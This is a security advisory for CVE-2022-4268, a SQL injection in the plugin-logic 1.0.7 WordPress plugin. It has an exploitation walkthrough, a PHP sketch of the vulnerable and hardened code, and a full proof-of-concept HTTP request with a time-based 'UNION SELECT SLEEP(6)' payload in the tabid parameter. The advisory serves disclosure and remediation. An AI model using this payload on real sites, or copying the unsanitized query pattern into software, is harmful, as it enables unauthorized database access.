plugin-logic 1.0.7 WordPress plug-in SQL injection

Vulnerability Metadata


Key                          Value
Date of Disclosure           December 02, 2022
Affected Software            plugin-logic
Affected Software Type       WordPress plugin
Version                      1.0.7
Weakness                     SQL Injection
CWE ID                       CWE-89
CVE ID                       CVE-2022-4268
CVSS 3.x Base Score          n/a
CVSS 2.0 Base Score          n/a
Reporter                     Kunal Sharma, Daniel Krohmer
Reporter Contact             k_sharma19@informatik.uni-kl.de
Link to Affected Software    https://wordpress.org/plugins/plugin-logic/
Link to Vulnerability DB     https://nvd.nist.gov/vuln/detail/CVE-2022-4268

Vulnerability Description


The tabid GET query parameter in plugin-logic 1.0.7 is vulnerable to SQL injection. An authenticated attacker can abuse the fetch-active-plugins functionality of the plulo_option_page function in plugin-logic.php: the parameter is used unsanitized when the database query is built, so a threat actor with admin access to a multisite setup can craft a malicious GET request that injects SQL.

Exploitation Guide


Log in as an admin user. The attack requires at least admin privileges. Note: the plugin must be installed in a multisite network, since the vulnerable page is served from the network admin dashboard (/wp-admin/network/).

plugin-logic_step-1.png

Go to Plugin Logic under the Plugins menu in the WordPress dashboard.

plugin-logic_step-2.png

Click Save Changes on any tab.

plugin-logic_step-3.png

Clicking this button triggers the vulnerable request. Intercept it and append an additional GET query parameter, tabid, to the request URL.

plugin-logic_step-4.png

A PoC may look like the following request:

plugin-logic_step-5.png

In the code, the vulnerability stems from the unsanitized user input tabid at line 203 of ./plugin-logic.php.

plugin-logic_step-6.png

At lines 213-216 of ./plugin-logic.php, the database query built from $selected_blog executes the injected SQL.

plugin-logic_step-7.png
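The PHP sketch below is an added, illustrative example written for this page; it is not code from plugin-logic.php. It reconstructs the pattern described above (an unvalidated tabid GET parameter flowing through $selected_blog into a query) next to a hardened version. The function names, the statement that stands in for lines 213-216, the nonce action 'plulo_save', and the treatment of tabid as either the literal 'options' tab or a numeric site id are assumptions made for the example.

```php
<?php
// Added illustrative example (editor's, not plugin-logic's own code).
// Names other than $_GET['tabid'] and $selected_blog are assumptions.

// --- Vulnerable pattern: the shape of the bug described above -------------
function plulo_active_plugins_vulnerable() {
    global $wpdb;

    // ?tabid=options%2bunion%2bSELECT%2bSLEEP(6)%3b%23 arrives here untouched.
    $selected_blog = isset( $_GET['tabid'] ) ? $_GET['tabid'] : 'options';

    // Hypothetical statement standing in for the one at lines 213-216:
    // an unquoted, unvalidated value in a numeric comparison lets the
    // attacker append arbitrary SQL (e.g. "1 OR SLEEP(6)").
    $sql = "SELECT blog_id FROM {$wpdb->blogs} WHERE blog_id = {$selected_blog}";
    return $wpdb->get_var( $sql );
}

// --- Hardened version -----------------------------------------------------
function plulo_active_plugins_hardened() {
    // Only network admins may reach this page, and the form must carry a
    // valid nonce ('plulo_save' is an assumed action name).
    if ( ! current_user_can( 'manage_network_plugins' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'plugin-logic' ), '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'plulo_save' );

    // sanitize_key() reduces the input to [a-z0-9_-]; the PoC payload
    // becomes "optionsunionselectsleep6", which matches nothing below.
    $tabid = isset( $_GET['tabid'] ) ? sanitize_key( wp_unslash( $_GET['tabid'] ) ) : 'options';

    // Allow-list: the literal 'options' tab or an existing numeric site id.
    if ( 'options' === $tabid ) {
        return (array) get_option( 'active_plugins', array() );
    }
    $blog_id = absint( $tabid );
    if ( 0 === $blog_id || null === get_site( $blog_id ) ) {
        wp_die( esc_html__( 'Invalid tab.', 'plugin-logic' ), '', array( 'response' => 400 ) );
    }

    // Preferred: let the WordPress API build the query for the chosen site.
    return (array) get_blog_option( $blog_id, 'active_plugins', array() );
}

// If raw SQL is unavoidable, bind every value with $wpdb->prepare();
// %d forces an integer, so no string the attacker sends reaches the parser.
function plulo_blog_exists_prepared( $blog_id ) {
    global $wpdb;
    $sql = $wpdb->prepare( "SELECT blog_id FROM {$wpdb->blogs} WHERE blog_id = %d", $blog_id );
    return (int) $wpdb->get_var( $sql ) === (int) $blog_id;
}
```

The decisive change is that the hardened path never lets tabid reach the SQL layer as text: it is either matched against a fixed set of tab names or coerced to an integer and checked against existing sites before any query is built. Capability and nonce checks do not fix the injection itself, but they are what keep the page limited to the privileged users the advisory assumes.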

Exploit Payload


Please note that the cookies and nonces must be replaced with values from your own session; otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below. Because the payload calls SLEEP(6), a successful injection is observable as a response delay of roughly six seconds compared to the same request without the tabid parameter:

POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%2bunion%2bSELECT%2bSLEEP(6)%3b%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/network/plugins.php?page=plugin-logic
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Cookie: wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666389039; wordpress_test_cookie=WP%20Cookie%20check; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C0abf94c1e22528cf048ff22b03d79223ba73c502056deb9a9ce748fa0c03b2c0; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C9bf5c239139b198a8856c9927f2cf4835b8583556b6e07b6270ec1284a59f953
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes